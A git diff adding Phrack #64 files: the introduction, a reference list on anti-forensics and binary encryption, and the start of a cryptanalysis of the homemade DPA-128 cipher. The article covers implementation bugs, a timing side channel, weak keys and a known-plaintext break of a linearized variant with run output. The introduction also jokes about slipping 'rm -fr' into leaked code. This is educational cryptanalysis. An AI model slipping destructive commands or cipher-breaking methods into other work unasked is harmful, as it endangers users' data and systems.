+     http://pax.grsecurity.net/
+
+ [3] binary reconstruction from a core image		Silvio Cesare
+     http://vx.netlux.org/lib/vsc03.html
+
+ [4] Antiforensic evolution: Self			Ripe & Pluf
+     http://www.phrack.org/show.php?p=63&a=11
+
+ [5] Next-Gen. Runtime binary encryption		Zeljko Vbra
+     http://www.phrack.org/show.php?p=63&a=13
+
+ [6] Fenris						Michal Zalewski
+     http://lcamtuf.coredump.cx/fenris/
+
+ [7] Ltrace						Ltrace team
+     http://freshmeat.net/projects/ltrace/
+
+ [8] The dude (replacement to ptrace)			Mammon
+     http://www.eccentrix.com/members/mammon/Text/d\
+     ude_paper.txt
+
+ [9] Binary protection schemes				Andrewg	
+     http://www.codebreakers-journal.com/viewar\
+     ticle.php?id=51&layout=abstract
+
+ [10] ET_REL injection in memory			JP
+      http://www.whatever.org.ar/~cuco/MERCANO.TXT
+      
+ [11] Hardened Gentoo project				Hardened team
+      http://www.gentoo.org/proj/en/hardened/
+
+ [12] Unpacking by Code Injection			Eduardo Labir
+      http://www.codebreakers-journal.com/viewart\
+      icle.php?id=36&layout=abstract
+      
\ No newline at end of file
diff --git a/phrack64/1.txt b/phrack64/1.txt
new file mode 100644
index 0000000..028ac59
--- /dev/null
+++ b/phrack64/1.txt
@@ -0,0 +1,202 @@
+              _                                                _
+            _/B\_                                            _/W\_
+            (* *)            Phrack #64 file 1               (* *)
+            | - |                                            | - |
+            |   |               Introduction                 |   |
+            |   |                                            |   |
+            |   |        By The Circle of Lost Hackers       |   |
+            |   |                                            |   |
+            |   |                                            |   |
+            (____________________________________________________)
+
+
+
+"As long as there is technology, there will be hackers. As long as there
+are hackers, there will be PHRACK magazine. We look forward to the next
+20 years"
+
+This is how the PHRACK63 Introduction was ending, telling everybody that
+the Staff would have changed and to expect a release sometimes in
+2006/2007. This is that release. This is the new staff, "The Circle of
+Lost Hackers". Every new management requires a presentation and we decided
+to do it by Prophiling ourselves. Useless to say, we'll keep anonymous,
+mainly for security reasons that everyone understands.
+
+Being anonymous doesn't mean at all being closed. Phrack staff has always
+evolved, and will always evolve, depending on who really care about being
+a smart-ass. The staff will always receive new people that cares about
+writing cool articles, meet new authors and help them at publishing their
+work in the best conditions. Grantee of freedom of speech will be
+preserved. It is the identity of our journal.
+
+Some people were starting to say that phrack would have never reborn. That
+there would have never been a PHRACK64 issue. We heard that while we were
+working on, we smiled and kept going on. Some others were saying that the
+spirit was lost, that everything was lost.
+
+No, Phrack is not dead. Neither is the spirit in it.
+
+All the past Phrack editors have done a great work, making the Phrack
+Magazine "the most technical, most original, the most Hacker magazine in
+the world", written by the Underground for the Underground.
+We are in debt with them, every single hacker, cracker or researcher
+of the Underground should feel in debt with them.
+For the work they did.
+For the spirit they contributed to spread.
+For the possibility of having a real Hacker magazine.
+
+No, nothing is or was ever lost. Things change, security becomes a
+business, some hackers sell exploits, others post for fame, but Phrack is
+here, totally free, for the community. No business, no industry, no honey,
+baby. Only FREEDOM and KNOWLEDGE.
+
+We know the burden of responsibility that we have and that's why we worked
+hard to bring you this release. It wasn't an easy challenge at all, we
+have lost some people during those months and met new ones. We decided to
+make our first issue without a "real" CFP, but just limit it to the
+closest people we had in the underground. A big thank to everyone who
+participated. We needed to understand who really was involved and who was
+lacking time, spirit or motivation: having each one a lot of work to do
+(writing, reviewing, extending and coding) was the best way to succeed in
+that. This is not a "change of direction", next issues will have their
+official CFP and whatever article is (and has always been) welcome.
+
+We know that we have a lot to learn, we're improving from our mistakes and
+from the problems we've been facing. Aswell, we know that this release is
+not "the perfect one", but we think that the right spirit is there and so
+is the endeavor. The promise to make each new release a better one is a
+challenge that we want to win.
+
+No, Phrack is not dead. And will never die.
+Long live to PHRACK.
+
+   - The Circle of Lost Hackers
+
+
+[-]=====================================================================[-]
+
+
+For this issue, we're bringing you the following :
+
+
+0x01 Introduction                                 The Circle of Lost Hackers
+0x02 Phrack Prophile of the new editors           The Circle of Lost Hackers
+0x03 Phrack World News                            The Circle of Lost Hackers
+0x04 A brief history of the Underground scene     The Circle of Lost Hackers
+0x05 Hijacking RDS TMC traffic information signal                      lcars
+                                                                      danbia
+0x06 Attacking the Core: Kernel Exploitation Notes                      twiz
+                                                                    sgrakkyu
+0x07 The revolution will be on YouTube                                gladio
+0x08 Automated vulnerability auditing in machine code           Tyler Durden
+0x09 The use of set_head to defeat the wilderness                       g463
+0x0a Cryptanalysis of DPA-128                                           sysk
+0x0b Mac OS X Wars - A XNU Hope                                         nemo
+0x0c Hacking deeper in the system                                    ankhara
+0x0d The art of exploitation: Autopsy of cvsxpl                  Ac1dB1tch3z
+0x0e Facing the cops					               Lance
+0x0f Remote blind TCP/IP spoofing				         Lkm
+0x10 Hacking your brain: The projection of consciousness             keptune
+0x11 International scenes				             Various
+
+
+Scene Shoutz:
+
+All the people who helped us during the writing of this issue especialy 
+assad, js, mx-, krk, sysk. Thank you for your support to Phrack. The
+magazine deserve a good amount of work and it is not possible without
+a strong and devoted team of hackers, admins, and coders.
+
+The circle of lost hackers is not a precise entity and people can join
+and quit it, but the main goal is always to give Phrack the release
+deserved by the underground hacking community. You can join us whenever
+you want to present a decent work to a wider range of peoples. We
+also need reviewers on all topics related to hardware hacking and
+body/mind experience.
+
+All the retards who pretend to be blackhat on irc and did a pityful
+attempt to leak Phrack on Full-Disclosure : Applause (Even the changes
+in the title were so subtle, a pity you did not put any rm -fr in the
+code, maybe you didnt know how to use uudecode ?)
+
+
+
+Enjoy the magazine!
+
+
+[-]=====================================================================[-]
+
+Nothing may be reproduced in whole or in part without the prior written
+permission from the editors. Phrack Magazine is made available to the
+public, as often as possible, free of charge.
+
+|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E
+]=---------=|
+
+Editors           : circle[at]phrack{dot}org
+Submissions       : circle[at]phrack{dot}org
+Commentary        : loopback[@]phrack{dot}org
+Phrack World News : pwn[at]phrack{dot}org
+
+|=-----------------------------------------------------------------------=|
+
+Submissions may be encrypted with the following PGP key:
+(Hint: Always use the PGP key from the latest issue)
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.4.5 (GNU/Linux)
+
+mQGiBEZSCpoRBAC0VU8+6+Sy9/8Csiz27VrdOIV9cxhaaGr2xTg/U8rrfzz4ybbZ
+hfFWJv+ttdu6C+JEATlGJKzn9mVJl35EieQcC8bNJ6SXz1oJHTDhFsGkG1A8Qi2k
+/yRPtljPceWWxgCxBfoc8BtvMLUbagSJ/PFzy+ibwCGfoMxYifbbkRyS8wCgmVUV
+gBmpzy4ls5qzegAqVP0CIyEEAK7b7UjnOqvEjsSqdgHy9fVOcxJhhIO/tP8sAvZR
+/juUPGcl6PtP/HPbgsyccPBZV6s0LYliu92y7sLZH8Yn9SWI87IZvJ3Jzo2KQIRC
+zlZ+PiSK9ITlTVd7EL0m8qXAlESBnjMA4of6+QckvuGnDTHPmHRsJEnseRr21XiH
++CmcA/9blLrNhK4hMwMlULB/3NnuejDjkyTTcAAFQx2efT0cUK6Esd0NSlLS4vlL
+3QWwnMTDsdc37sTBbhM1c6gwjD46lz2G4bJWXCZZAb6mGNHDkKL9VosW+CN3KtMa
+MOvFqVOKM0JnzHAHAzL2cyhUqUU9WYOHMv/ephWeFTooadcrqbQ/VGhlIENpcmNs
+ZSBvZiBMb3N0IEhhY2tlcnMgKHd3dy5waHJhY2sub3JnKSA8Y2lyY2xlQHBocmFj
+ay5vcmc+iGYEExECACYFAkZSCpoCGwMFCQPCZwAGCwkIBwMCBBUCCAMEFgIDAQIe
+AQIXgAAKCRCtZBmRMDi989eZAJ9X06v6ATXz1/kj+SG1GF5aRedM6QCgjkhZLVQP
+aNUYru8KVtzfxd0J6om5Ag0ERlIKrRAIAMgbTDk286rkgrJkCFQo9h8Pf1hSBOyT
+yU/BFd0PDKEk8+cMsMtPmS0DzBGv5PSa+OWLNPxCyAEXis5sKpoFVT5mEkFM8FCh
+Z2x7zzPbI+bzyGMTQ4kPaxoTf2Ng/4ZE1W+iCyyTsSwtjxQkx2M4IOzW5rygtw2z
+lqrbUN+ikKQ9c2+oleIxEdWiumeiw7FkypExWjo+7HCC2QnPtBVYzmw5Ed6xDS1L
+rXQ+rKj23L7/KL0WSegQ9zfrrVKISD83kiUgjyopXMBY2tPUdUFlpsImE8fNZ3Rm
+hYW0ibpOWUdu6K+DnAu5ZzgYhVAWkR5DQkVTGUY3+n/C2G/7CfMJhrMAAwYH/1Pw
+dlFmRQy6ZrxEWEGHpYaHkAjP1vi4VM82v9duYHf1n25OiJhjf9TDAHTfZBDnlBhz
+CgWCwi79ytMFOCIHy9IvfxG4jNZvVTX2ZhOfPNullefHop3Gsq7ktAxgKJJDZ4cT
+oVHzF4uCv7cCrn76BddGhYd7nru59yOGDPoV5f7xpNi1cxgoQsF20IpyY79cI8co
+jimET3B1F3KoxOtzV5u+vxs6+tdWP4ed5uGiYJNBC+h4yRl1CChDDDHjmXGNPJrr
++2Y49Hs2b3GsbCyaDaBv3fMn96tzwcXzWxRV9q4/pxot/W7CRpimCM4gHsrw9mZa
++Lo+GykjtzVMMdUeZWaITwQYEQIADwUCRlIKrQIbDAUJA8JnAAAKCRCtZBmRMDi9
+80yQAJ9v7DcHj42YzpFRC7tPrGP72IB/pgCdHjt52h4ocdJpq5mKKwb6yONj5xM=
+=Nf2W
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+phrack:~# head -22 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of
+ *  the editors and contributors, truthful and accurate.  When possible,
+ *  all facts are checked, all code is compiled.  However, we are not
+ *  omniscient (hell, we don't even get paid).  It is entirely possible
+ *  something contained within this publication is incorrect in some way.
+ *  If this is the case, please drop us some email so that we can correct
+ *  it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for
+ *  the entirely stupid (or illegal) things people may do with the
+ *  information contained herein.  Phrack is a compendium of knowledge,
+ *  wisdom, wit, and sass.  We neither advocate, condone nor participate
+ *  in any sort of illicit behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in
+ *  the articles of Phrack Magazine are intellectual property of their
+ *  authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+-EOF-
diff --git a/phrack64/10.txt b/phrack64/10.txt
new file mode 100644
index 0000000..77c5e9d
--- /dev/null
+++ b/phrack64/10.txt
@@ -0,0 +1,1459 @@
+              _                                                _
+            _/B\_                                            _/W\_
+            (* *)             Phrack #64 file 10             (* *)
+            | - |                                            | - |
+            |   |          Cryptanalysis of DPA-128          |   |
+            |   |                                            |   |
+            |   |                  By SysK                   |   |
+            |   |                                            |   |
+            |   |            syskall@phreaker.net            |   |
+            (____________________________________________________)
+
+
+--[ Contents
+
+1 - Introduction
+2 - A short word about block ciphers
+3 - Overview of block cipher cryptanalysis
+4 - Veins' DPA-128
+  4.1 - Bugs in the implementation
+  4.2 - Weaknesses in the design
+5 - Breaking the linearized version
+6 - On the non linearity of addition modulo n in GF(2)
+7 - Exploiting weak keys
+  7.1 - Playing with a toy cipher
+  7.2 - Generalization and expected complexity
+  7.3 - Cardinality of |W
+8 - Breaking DPA based unkeyed hash function
+  8.1 - Introduction to hash functions
+  8.2 - DPAsum() algorithm
+  8.3 - Weaknesses in the design/implementation
+  8.4 - A (2nd) preimage attack
+9 - Conclusion
+10 - Greetings
+11 - Bibliography
+
+
+--[ 1 - Introduction
+
+While the cracking scene has grown with cryptology thanks to the evolution
+of binary protection schemes, the hacking scene mostly hasn't. This fact
+is greatly justified by the fact that there were globally no real need. 
+Indeed it's well known that if a hacker needs to decrypt some files then 
+he will hack into the box of its owner, backdoor the system and then use
+it to steal the key. A cracker who needs to break a protection scheme will
+not have the same approach: he will usually try to understand it fully in
+order to find and exploit design and/or implementation flaws. 
+
+Although the growing of the security industry those last years changed a 
+little bit the situation regarding the hacking community, nowadays there 
+are still too many people with weak knowledge of this science. What is 
+disturbing is the broadcast of urban legends and other hoax by some
+paranoids among them. For example, haven't you ever heard people claiming
+that government agencies were able to break RSA or AES? A much more clever
+question would have been: what does "break" mean? 
+
+A good example of paranoid reaction can be found in M1lt0n's article
+[FakeP63]. The author who is probably skilled in hacking promotes the use
+of "home made cryptographic algorithms" instead of standardized ones such
+as 3DES. The corresponding argument is that since most so-called security
+experts lake coding skills then they aren't able to develop appropriate
+tools for exotic ciphers. While I agree at least partially with him
+regarding the coding abilities, I can't possibly agree with the main
+thesis. Indeed if some public tools are sufficient to break a 3DES based
+protection then it means that a design and/or an implementation mistake
+was/were made since, according to the state of the art, 3DES is still
+unbroken. The cryptosystem was weak from the beginning and using "home 
+made cryptography" would only weaken it more. 
+
+It is therefore extremely important to understand cryptography and to 
+trust the standards. In a previous Phrack issue (Phrack 62), Veins exposed
+to the hacking community a "home made" block cipher called DPA (Dynamic 
+Polyalphabetic Algorithms) [DPA128]. In the following paper, we are going 
+to analyze this cipher and demonstrate that it is not flawless - at least
+from a cryptanalytic perspective - thus fitting perfectly with our talk.
+
+
+--[ 2 - A short word about block ciphers
+
+Let's quote a little bit the excellent HAC [MenVan]:
+
+"A block cipher is a function which maps n-bit plaintext blocks to n-bit 
+ciphertext blocks; n is called the blocklength. It may be viewed as a 
+simple substitution cipher with large character size. The function is 
+parametrized by a k-bit key K, taking values from a subset |K (the key 
+space) of the set of all k-bit vectors Vk. It is generally assumed that
+the key is chosen at random. Use of plaintext and ciphertext blocks of
+equal size avoids data expansion." 
+
+Pretty clear isn't it? :> So what's the purpose of such a cryptosystem? 
+Obviously since we are dealing with encryption this class of algorithms
+provides confidentiality. Its construction makes it particularly suitable
+for applications such as large volumes encryption (files or HD for 
+example). Used in special modes such as CBC (like in OpenSSL) then it can 
+also provide stream encryption. For example, we use AES-CBC in the WPA2, 
+SSL and SSH protocols.
+
+Remark: When used in conjunction with other mechanisms, block ciphers can 
+also provide services such as authentication or integrity (cf part 8 of 
+the paper).
+
+An important point is the understanding of the cryptology utility. While 
+cryptography aims at designing best algorithms that is to say secure and 
+fast, cryptanalysis allows the evaluation of the security of those 
+algorithms. The more an algorithm is proved to have weaknesses, the less 
+we should trust it.
+
+
+--[ 3 - Overview of block cipher cryptanalysis
+
+The cryptanalysis of block ciphers evolved significantly in the 90s with 
+the apparition of some fundamental methods such as the differential 
+[BiSha90] and the linear [Matsui92] cryptanalysis. In addition to some 
+more recent ones like the boomerang attack of Wagner or the chi square 
+cryptanalysis of Vaudenay [Vaud], they constitute the set of so-called
+statistical attacks on block ciphers in opposition to the very recent and
+still controverted algebraic ones (see [CourtAlg] for more information).
+
+Today the evolution of block cipher cryptanalysis tends to stabilize 
+itself. However a cryptographer still has to acquire quite a deep knowledge
+of those attacks in order to design a cipher. Reading the Phrack paper, we 
+think - actually we may be wrong - that the author mostly based his design 
+on statistical tests. Although they are obviously necessary, they can't 
+possibly be enough. Every component has to be carefully chosen. We 
+identified several weaknesses and think that some more may still be left.
+
+
+--[ 4 - Veins' DPA-128 description
+
+DPA-128 is a 16 rounds block cipher providing 128 bits block encryption 
+using an n bits key. Each round encryption is composed of 3 functions
+which are rbytechain(), rbitshift() and S_E(). Thus for each input block,
+we apply the E() function 16 times (one per round) :
+
+void E (unsigned char *key, unsigned char *block, unsigned int shift)
+{
+    rbytechain (block);
+    rbitshift (block, shift);
+    S_E (key, block, shift);
+}
+
+where:
+
+- block is the 128b input
+- shift is a 32b parameter dependent of the round subkey
+- key is the 128b round subkey
+
+Consequently, the mathematical description of this cipher is:
+f: |P x |K ----> |C
+
+where:
+    - |P is the set of all plaintexts
+    - |K is the set of all keys
+    - |C is the set of all ciphertexts
+
+For p element of |P, k of |K and c of |C, we have c = f(p,k)
+with f = EE...EE = E^16 and  meaning the composition of functions.
+
+We are now going to describe each function. Since we sometimes may need
+mathematics to do so, we will assume that the reader is familiar with
+basic algebra ;>
+
+rbytechain() is described by the following C function:
+
+void rbytechain(unsigned char *block)
+{
+    int i;
+    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
+        block[i] ^= block[(i + 1) % DPA_BLOCK_SIZE];
+    return;
+}
+
+where:
+    - block is the 128b input
+    - DPA_BLOCK_SIZE equals 16
+
+Such an operation on bytes is called linear mixing and its goal is to 
+provide the diffusion of information (according to the well known Shannon
+theory). Mathematically, it's no more than a linear map between two GF(2) 
+vector spaces of dimension 128. Indeed, if U and V are vectors over GF(2) 
+representing respectively the input and the output of rbytechain() then 
+V = M.U where M is a 128x128 matrix over GF(2) of the linear map where 
+coefficients of the matrix are trivial to find. Now let's see rbitshift(). 
+Its C version is:
+
+void rbitshift(unsigned char *block, unsigned int shift)
+{
+    unsigned int i;
+    unsigned int div;
+    unsigned int mod;
+    unsigned int rel;
+    unsigned char mask;
+    unsigned char remainder;
+    unsigned char sblock[DPA_BLOCK_SIZE];
+    
+    if (shift)
+    {
+        mask = 0;
+        shift %= 128;
+        div = shift / 8;
+        mod = shift % 8;
+        rel = DPA_BLOCK_SIZE - div;
+        for (i = 0; i < mod; ++i)
+            mask |= (1 << i);
+
+        for (i = 0; i < DPA_BLOCK_SIZE; ++i)
+        {
+            remainder =
+            ((block[(rel + i - 1) % DPA_BLOCK_SIZE]) & mask) << (8 - mod);
+            sblock[i] = 
+	    ((block[(rel + i) % DPA_BLOCK_SIZE]) >> mod) | remainder;
+        }
+     }
+     memcpy(block, sblock, DPA_BLOCK_SIZE);
+}
+
+ where:
+    - block is the 128b input
+    - DPA_BLOCK_SIZE equals 16
+    - shift is derived from the round subkey
+
+Veins describes it in his paper as a key-related shifting (in fact it has
+to be a key-related 'rotation' since we intend to be able to decrypt the 
+ciphertext ;)). A careful read of the code and several tests confirmed that
+it was not erroneous (up to a bug detailed later in this paper), so we can 
+describe it as a linear map between two GF(2) vector spaces of dimension 128. 
+
+Indeed, if V and W are vectors over GF(2) representing respectively the 
+input and the output of rbitshift() then:
+
+W = M'.V where M' is the 128x128 matrix over GF(2) of the linear 
+map where, unlike the previous function, coefficients of the matrix are 
+unknown up to a probability of 1/128 per round.
+
+Such a function also provides diffusion of information.
+
+Finally, the last operation S_E() is described by the C code:
+
+void S_E (unsigned char *key, unsigned char *block, unsigned int s)
+{
+    int i;
+    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
+        block[i] = (key[i] + block[i] + s) % 256;
+    return;
+}
+
+where:
+    - block is the 128b input
+    - DPA_BLOCK_SIZE equals 16
+    - s is the shift parameter described in the previous function
+    - key is the round subkey
+
+The main idea of veins' paper is the so-called "polyalphabetic substitution"
+concept, whose implementation is supposed to be the S_E() C function. 
+Reading the code, it appears to be no more than a key mixing function over 
+GF(2^8). 
+
+Remark: We shall see later the importance of the mathematical operation
+know as 'addition' over GF(2^8). Regarding the key scheduling, each cipher 
+round makes use of a 128b subkey as well as of a 32b one deriving from it
+called "shift". The following pseudo code describes this operation:
+
+    skey(0) = checksum128(master_key)
+    for i = 0, nbr_round-2:
+        skey(i+1) = checksum128(skey(i))
+    skey(0) = skey(15)
+    for i = 0, nbr_round-1:
+        shift(nbr_round-1 - i) = hash32(skey(i))
+
+where skey(i) is the i'th subkey.
+
+It is not necessary to explicit the checksum128() and hash32(), the reader
+just has to remind this thing: whatever the weakness there may be in those
+functions, we will now consider them being true oneway hash functions 
+providing perfect entropy.
+
+As a conclusion, the studied cipher is closed to being a SPN (Substitution
+- Permutation Network) which is a very generic and well known construction 
+(AES is one for example).
+
+
+--[ 4.1 - Bugs in the implementation
+
+Although veins himself honestly recognizes that the cipher may be weak and
+"strongly discourages its use" to quote him [DPA128], some people could 
+nevertheless decide to use it as a primitive for encryption of personal 
+and/or sensitive data as an alternative to 'already-cracked-by-NSA' 
+ciphers [NSA2007]. Unfortunately for those theoretical people, we were able
+to identify a bug leading to a potentially incorrect functioning of the 
+cryptosystem (with a non negligible probability). 
+
+We saw earlier that the bitshift code skeleton was the following:
+
+/* bitshift.c */
+void {r,l}bitshift(unsigned char *block, unsigned int shift)
+{
+    [...] // SysK : local vars declaration
+    unsigned char sblock[DPA_BLOCK_SIZE];
+    if (shift)
+    {
+        [...] // SysK : sblock initialization
+    }
+    memcpy(block, sblock, DPA_BLOCK_SIZE);
+}
+
+Clearly, if 'shift' is 0 then 'block' is fed with stack content! Obviously
+in such a case the cryptosystem can't possibly work. 
+
+Since shift is an integer, such an event occurs with at least a theoretical
+probability of 1/2^32 per round.
+
+Now let's study the shift generation function:
+
+/* hash32.c */
+/*
+* This function computes a 32 bits output out a variable length input. It is
+* not important to have a nice distribution and low collisions as it is used
+* on the output of checksum128() (see checksum128.c). There is a requirement
+* though, the function should not consider \0 as a key terminator.
+*/
+
+unsigned long hash32(unsigned char *k, unsigned int length)
+{
+    unsigned long h;
+    for (h = 0; *k && length; ++k, --length)
+    h = 13 * h + *k;
+    return (h);
+}
+
+As stated in the C code commentary, hash32() is the function which produces
+the shift. Although the author is careful and admits that the output 
+distribution may not be completely uniform (not exactly equal probability
+for each byte value to appear) it is obvious that a strong bias is not
+desirable (Cf 7.3). 
+
+However what happens if the first byte pointed by k is 0 ? Since the loop
+ends for k equal to 0, then h will be equal to 13 * 0 + 0 = 0. Assuming 
+that the underlying subkey is truly random, such an event should occur with
+a probability of 1/256 (instead of 1/2^32). Since the output of hash32() is
+an integer as stated in the comment, this is clearly a bug. 
+
+We could be tempted to think that this implementation failure leads to a 
+weakness but a short look at the code tells us that:
+
+struct s_dpa_sub_key {
+    unsigned char key[DPA_KEY_SIZE];
+    unsigned char shift;
+};
+
+typedef struct s_dpa_sub_key DPA_SUB_KEY;
+
+Therefore since shift is a char object, the presence of "*k &&" in the code
+doesn't change the fact that the cryptosystem will fail with a probability 
+of 1/256 per round.
+
+Since the bug may appear independently in each round, the probability of 
+failure is even greater:
+
+p("fail") = 1 - p("ok")
+          = 1 - Mul( p("ok in round i") )
+          = 1 - (255/256)^16
+	  = 0.0607...
+
+where i is element of [0, (nbr_rounds - 1)]
+It's not too far from 1/16 :-)
+
+Remark: We shall see later that the special case where shift is equal to 0 
+is part of a general class of weak keys potentially allowing an attacker to 
+break the cryptosystem.
+
+Hunting weaknesses and bugs in the implementation of cryptographic 
+primitives is the common job of some reverse engineers since it sometimes 
+allows to break implementations of algorithms which are believed to be 
+theoretically secure. While those flaws mostly concern asymmetric 
+primitives of digital signature or key negotiation/generation, it can also
+apply in some very specific cases to the block cipher world.
+
+From now, we will consider the annoying bug in bitshift() fixed.
+
+
+--[ 4.2 - Weaknesses in the design
+
+When designing a block cipher, a cryptographer has to be very careful about
+every details of the algorithm. In the following section, we describe 
+several design mistakes and explain why in some cases, it can reduce the 
+security of the cipher.
+
+a) We saw earlier that the E() function was applied to each round. However 
+such a construction is not perfect regarding the first round. Since 
+rbytechain() is a linear mixing operating not involving key material, it 
+shouldn't be used as the first operation on the input buffer since its 
+effect on it can be completely canceled. Therefore, if a cryptanalyst wants
+to attack the bitshift() component of the first round, he just have to 
+apply lbytechain() (the rbytechain() inverse function) to the input vector.
+It would thus have been a good idea to put a key mixing as the first 
+operation.
+
+b) The rbitshift() operation only need the 7 first bits of the shift 
+character whereas the S_E() uses all of them. It is also generally 
+considered a bad idea to use the same key material for several operations.
+
+c) If for some reason, the attacker is able to leak the second (not the 
+first) subkey then it implies the compromising of all the key material. Of
+course the master key will remain unknown because of the onewayness of 
+checksum128() however we do not need to recover it in order to encrypt
+and/or decrypt datas.
+
+d) In the bitshift() function, a loop is particularly interesting:
+
+for (i = 0; i < mod; ++i)
+    mask |= (1 << i);
+
+What is interesting is that the time execution of the loop is dependent of
+"mod" which is derived from the shift. Therefore we conclude that this loop
+probably allows a side channel attack against the cipher. Thanks to X for 
+having pointed this out ;> In the computer security area, it's well known 
+that a single tiny mistake can lead to the total compromising of an 
+information system. In cryptography, the same rules apply.
+
+
+--[ 5 - Breaking the linearized version
+
+Even if we regret the non justification of addition operation employment,
+it is not the worst choice in itself. What would have happen if the key 
+mixing had been done with a xor operation over GF(2^8) instead as it is the
+case in DES or AES for example?
+
+To measure the importance of algebraic consideration in the security of a 
+block cipher, let's play a little bit with a linearized version of the 
+cipher. That is to say that we replace the S_E() function with the 
+following S_E2() where :
+
+void S_E2 (unsigned char *key, unsigned char *block, unsigned int s)
+{
+    int i;
+    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
+        block[i] = (key[i] ^ block[i] ^ s) % 256; [1] 
+	// + is replaced by xor
+    return;
+}
+
+If X, Y and K are vectors over GF(2^8) representing respectively the input,
+the output of S_E2() and the round key material then Y = X xor K.
+
+Remark: K = sK xor shift. We use K for simplification purpose.
+
+Now considering the full round we have :
+
+V = M.U         [a] (rbytechain)
+W = M'.V        [b] (rbitshift)
+Y = W xor K     [c] (S_E2)
+
+Linear algebra allows the composition of applications rbytechain() and 
+rbitshift() since the dimensions of M and M' match but W in [b] is a vector
+over GF(2) whereas W in [c] is clearly over GF(2^8). However, due to the 
+use of XOR in [c], Y, W and K can also be seen as vectors over GF(2). 
+Therefore, S_E2() is a GF(2) affine map between two vector spaces of
+dimension 128.
+
+We then have:
+
+Y = M'.M.U xor K
+
+The use of differential cryptanalysis will help us to get rid of the key. 
+Let's consider couples (U0,Y0 = E(U0)) and (U1,Y1 = E(U1)) then:
+
+DELTA(Y) = Y0 xor Y1
+         = (M'.M.U0 xor K) xor (M'.M.U1 xor K)
+         = (M'.M.U0 xor M'.M.U1) xor K xor K     (commutativity & 
+	                                          associativity of xor)
+         = (M'.M).(U0 xor U1)                     (distributivity)
+         = (M'.M).DELTA(U)
+
+Such a result shows us that whatever sK and shift are, there is always a
+linear map linking an input differential to the corresponding output 
+differential. 
+
+The generalization to the 16 rounds using matrix multiplication is obvious. 
+Therefore we have proved that there exists a 128x128 matrix Mf over GF(2) 
+such as DELTA(Y) = Mf.DELTA(X) for the linearized version of the cipher.
+
+Then assuming we know one couple (U0,Y0) and Mf, we can encrypt any input U.
+Indeed, Y xor Y0 = Mf.(U xor U0) therefore Y = (Mf.(U xor U0)) xor Y0.
+
+Remark 1: The attack doesn't give us the knowledge of subkeys and shifts 
+but such a thing is useless. The goal of an attacker is not the key in 
+itself but rather the ability of encrypting/decrypting a set of 
+plaintexts/ciphertexts. Furthermore, considering the key scheduling 
+operation, if we really needed to recover the master key, it would be quite
+a pain in the ass considering the fact that checksum128() is a one way 
+function ;-)
+
+Remark 2: Obviously in order to decrypt any output Y we need to calculate 
+Mf^-1 which is the inverse matrix of Mf. This is somewhat more interesting
+isn't it ? :-)
+
+Because of rbitshift(), we are unable to determine using matrix 
+multiplications the coefficients of Mf. An exhaustive search is of course 
+impossible because of the huge complexity (2^16384) however, finding them 
+is equivalent to solving 128 systems (1 system per row of Mf) of 128 
+variables (1 variable per column) in GF(2). To build such a system, we need
+128 couples of (cleartext,ciphertext). The described attack was implemented
+using the nice NTL library ([SHOUP]) and can be found in annexe A of this
+paper.
+
+$ g++ break_linear.cpp bitshift.o bytechain.o key.c hash32.o checksum128.o 
+-o break_linear -lntl -lcrypto -I include
+$ ./break_linear
+[+] Generating the plaintexts / ciphertexts
+[+] NTL stuff !
+[+] Calculation of Mf
+[+] Let's make a test !
+[+] Well done boy :>
+
+Remark: Sometimes NTL detects a linear relation between chosen inputs 
+(DELTA_X) and will then refuse to work. Indeed, in order to solve the 128 
+systems, we need a situation where every equations are independent. If it's
+not the case, then obviously det(M) is equal to 0 (with probability 1/2). 
+Since inputs are randomly generated, just try again until it works :-)
+
+$ ./break_linear
+[+] Generating the plaintexts / ciphertexts
+[+] NTL stuff !
+det(M) = 0
+
+As a conclusion we saw that the linearity over GF(2) of the xor operation 
+allowed us to write an affine relation between two elements of GF(2)^128 in
+the S_E2() function and then to easily break the linearized version using a
+128 known plaintext attack. The use of non linearity is crucial in the 
+design. Fortunately for DPA-128, Veins chose the addition modulo 256 as the
+key mixer which is naturally non linear over GF(2).
+
+
+--[ 6 - On the non linearity of addition modulo n over GF(2)
+
+The bitshift() and bytechain() functions can be described using matrix over 
+GF(2) therefore it is interesting to use this field for algebraic 
+calculations.
+
+The difference between addition and xor laws in GF(2^n) lies in the carry 
+propagation:
+
+w(i) + k(i) = w(i) xor k(i) xor carry(i)
+where w(i), k(i) and carry(i) are elements of GF(2). 
+
+We note w(i) as the i'th bit of w and will keep this notation until the end. 
+carry(i), written c(i) for simplification purpose, is defined recursively:
+
+c(i+1) = w(i).k(i) xor w(i).c(i) xor k(i).c(i)
+with c(0) = 0
+
+Using this notation, it would thus be possible to determine a set of 
+relations over GF(2) between input/output bits which the attacker controls
+using a known plaintext attack and the subkey bits (which the attacker
+tries to guess).
+
+However, recovering the subkey bits won't be that easy. Indeed, to determine
+them, we need to get rid of the carries replacing them by multivariate 
+polynomials were unknowns are monomials of huge order.
+
+Remark 1: Because of the recursivity of the carry, the order of monomials 
+grows up as the number of input bits per round as well as the number of 
+rounds increases.
+
+Remark 2: Obviously we can not use intermediary input/output bits in our
+equations. This is because unlike the subkey bits, they are dependent of the
+input.
+
+We are thus able to express the cryptosystem as a multivariate polynomial 
+system over GF(2). Solving such a system is NP-hard. There exists methods
+for system of reasonable order like groebner basis and relinearization 
+techniques but the order of this system seems to be far too huge.
+
+However for a particular set of keys, the so-called weak keys, it is 
+possible to determine the subkeys quite easily getting rid of the complexity
+introduced by the carry.
+
+
+--[ 7 - Exploiting weak keys
+
+Let's first define a weak key. According to wikipedia:
+
+"In cryptography, a weak key is a key which when used with a specific 
+cipher, makes the cipher behave in some undesirable way. Weak keys usually
+represent a very small fraction of the overall keyspace, which usually 
+means that if one generates a random key to encrypt a message weak keys are
+very unlikely to give rise to a security problem. Nevertheless, it is 
+considered desirable for a cipher to have no weak keys."
+
+Actually we identified a particular subset |W of |K allowing us to deal 
